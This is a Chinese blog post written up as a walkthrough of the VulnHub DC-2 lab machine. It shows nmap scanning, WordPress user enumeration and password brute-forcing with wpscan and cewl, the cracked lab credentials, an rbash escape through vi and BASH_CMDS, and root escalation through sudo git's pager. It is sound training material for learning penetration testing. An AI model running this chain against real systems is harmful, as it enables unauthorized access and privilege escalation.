
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8" />
    <title>DC-2靶机练习 | youbing的博客</title>
    <meta name="author" content="youbing" />
    <meta name="description" content="技术博客，分享编程学习笔记" />
    <meta name="keywords" content="编程,学习,技术" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/tx.gif" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>YOUBING的博客</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;YOUBING的博客</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>DC-2靶机练习</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2026/9/10
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/tags/%E9%9D%B6%E6%9C%BA/" style="color: #00bcd4">
                    靶机
                </a>
            </span>
            
            <span class="tag">
                
                <a href="/tags/%E6%B8%97%E9%80%8F/" style="color: #ff7d73">
                    渗透
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <h2 id="靶机安装"><a href="#靶机安装" class="headerlink" title="靶机安装"></a>靶机安装</h2><p>在vulnhub上下载DC-2靶机<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-2,311/#fileinfo">DC：2 ~ VulnHub</a><br><img src="/source/images/14eca390dc71d2edec2f456a2bdfeaf0_MD5.jpg"></p>
<p>解压文件后，使用vm打开，创建名称和选择位置导入即可。<br><img src="/source/images/7a4fd391c86f9eea5ee874414c9cb8d7_MD5.jpg"></p>
<h2 id="靶场练习"><a href="#靶场练习" class="headerlink" title="靶场练习"></a>靶场练习</h2><p>先探查同一网段下存活的主机找一下靶机的ip，用nmap输入命令。</p>
<pre class="line-numbers language-none"><code class="language-none">nmap -sn 192.168.179.0&#x2F;24<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>找到靶机的ip地址。<br><img src="/source/images/Pasted%20image%2020260910185026.png"><br>用nmap扫描一下开放端口。</p>
<pre class="line-numbers language-none"><code class="language-none">nmap -p- --min-rate 10000 192.168.179.140<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>发现一个80端口开放了http服务，访问发现ip自动变成了<a target="_blank" rel="noopener" href="http://dc-2/%E3%80%82">http://dc-2/。</a><br><img src="/source/images/Pasted%20image%2020260910185417.png">因为无法解析域名所以访问失败，在host文件中添加解析。</p>
<pre class="line-numbers language-none"><code class="language-none">echo &quot;192.168.179.140 dc-2&quot; | sudo tee -a &#x2F;etc&#x2F;hosts<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>成功访问并找到flag1。<br><img src="/source/images/Pasted%20image%2020260910190034.png">flag1暗示暴力破解，先找到登录界面，用dirsearch扫一下。</p>
<pre class="line-numbers language-none"><code class="language-none">dirsearch -u http:&#x2F;&#x2F;dc-2&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>找到后台登录界面。<br><img src="/source/images/Pasted%20image%2020260910190426.png"><br>准备暴力破解，先枚举一下用户名。</p>
<pre class="line-numbers language-none"><code class="language-none">wpscan --url http:&#x2F;&#x2F;dc-2 --enumerate u<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/source/images/Pasted%20image%2020260910192941.png"><br>根据网站生成一份字典。</p>
<pre class="line-numbers language-none"><code class="language-none">cewl http:&#x2F;&#x2F;dc-2&#x2F; &gt; password.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/source/images/Pasted%20image%2020260910193356.png"><br>然后对枚举出来的用户名进行爆破。</p>
<pre class="line-numbers language-none"><code class="language-none">wpscan --url http:&#x2F;&#x2F;dc-2 --passwords password.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>只跑出jerry和tom的密码。</p>
<p><img src="/source/images/Pasted%20image%2020260910193736.png">                                                                                                                                                                                </p>
<pre class="line-numbers language-none"><code class="language-none">jerry &#x2F; adipiscing   
tom &#x2F; parturient  <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>登录jerry，在pages中找到flag2。<br><img src="/source/images/Pasted%20image%2020260910194037.png"></p>
<p>登录tom没有发现有用信息。<br><img src="/source/images/Pasted%20image%2020260910194825.png"></p>
<p>靶机还开了一个ssh服务在7744端口，尝试连接，jerry一直连不上用tom连上了。<br><img src="/source/images/Pasted%20image%2020260910195307.png"></p>
<p>ls看看有什么东西，找到flag3。<br><img src="/source/images/Pasted%20image%2020260910195516.png"></p>
<p>查看flag3的内容，好像还不让cat。<br><img src="/source/images/Pasted%20image%2020260910195750.png"></p>
<p>看看能用什么命令。</p>
<pre class="line-numbers language-none"><code class="language-none">compgen -c<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>发现有一个编辑命令。<br><img src="/source/images/Pasted%20image%2020260910200034.png"></p>
<p>编辑flag3.txt也能查看内容。</p>
<pre class="line-numbers language-none"><code class="language-none">vi flag3.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/source/images/Pasted%20image%2020260910200303.png"></p>
<p>这里应该是要用su提权到jerry，直接用su发现行不通。<br><img src="/source/images/Pasted%20image%2020260910201010.png"></p>
<p>尝试vi进行rbash逃逸再提权。</p>
<pre class="line-numbers language-none"><code class="language-none">vi 任意文件

:set shell&#x3D;&#x2F;bin&#x2F;bash

:shell<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>执行成功后可以cd..返回上级。<br><img src="/source/images/Pasted%20image%2020260910201617.png"></p>
<p>然后进入jerry目录，ls发现flag4.<br><img src="/source/images/Pasted%20image%2020260910201742.png"></p>
<p>再用vi查看flag4.txt。<br><img src="/source/images/Pasted%20image%2020260910201819.png"></p>
<p>现在离最后的flag很近了，之前su命令用不了，尝试用环境变量提权。</p>
<pre class="line-numbers language-none"><code class="language-none">BASH_CMDS[a]&#x3D;&#x2F;bin&#x2F;sh;a         &#x2F;&#x2F;把&#x2F;bin&#x2F;sh给a

&#x2F;bin&#x2F;bash

export PATH&#x3D;$PATH:&#x2F;bin&#x2F;         &#x2F;&#x2F;添加环境变量

export PATH&#x3D;$PATH:&#x2F;usr&#x2F;bin      &#x2F;&#x2F;添加环境变量<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="/source/images/Pasted%20image%2020260910203003.png"></p>
<p>现在已经提权到jerry，看看jerry能干嘛。</p>
<pre class="line-numbers language-none"><code class="language-none">sudo -l<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>发现能够不用root权限使用git，结合flag4的提示这里用git提权。<br><img src="/source/images/Pasted%20image%2020260910203344.png"></p>
<p>先调窄窗口让回显信息不能一页显示，然后执行git hlep,在分页器界面输入!&#x2F;bin&#x2F;bash。</p>
<pre class="line-numbers language-none"><code class="language-none">stty rows 20 cols 80

sudo git help config

!&#x2F;bin&#x2F;bash<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>执行完输入whoami，回显root。<br><img src="/source/images/Pasted%20image%2020260910210737.png"></p>
<p>cd &#x2F;root 就能找到最后的flag了，cat final-flag.txt查看。<br><img src="/source/images/Pasted%20image%2020260910210949.png"></p>
<h2 id="靶机复盘"><a href="#靶机复盘" class="headerlink" title="靶机复盘"></a>靶机复盘</h2><h3 id="攻击链"><a href="#攻击链" class="headerlink" title="攻击链"></a>攻击链</h3><p>查找ip-&gt;端口扫描-&gt;dirseach扫描找登录界面-&gt;wpscan用户名枚举-&gt;cewl字典生成-&gt;wpscan暴力破解-&gt;ssh连接-&gt;环境变量提权-&gt;水平越权-&gt;git提权</p>

    </div>
    
    
    
    
    <div id="comment">
        <div id="giscus-container" class="giscus"></div>
    </div>
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2026 - 2026 youbing的博客
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;youbing
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    
<script
    src="https://giscus.app/client.js"
    data-repo="youbing3432213764-coder/youbing3432213764-coder.github.io"
    data-repo-id=""
    data-category=""
    data-category-id=""
    data-mapping="pathname"
    data-strict="0"
    data-reactions-enabled="1"
    data-emit-metadata="0"
    data-input-position="bottom"
    data-theme="preferred_color_scheme"
    data-lang=""
    crossorigin
    async
></script>





    
</body>
</html>
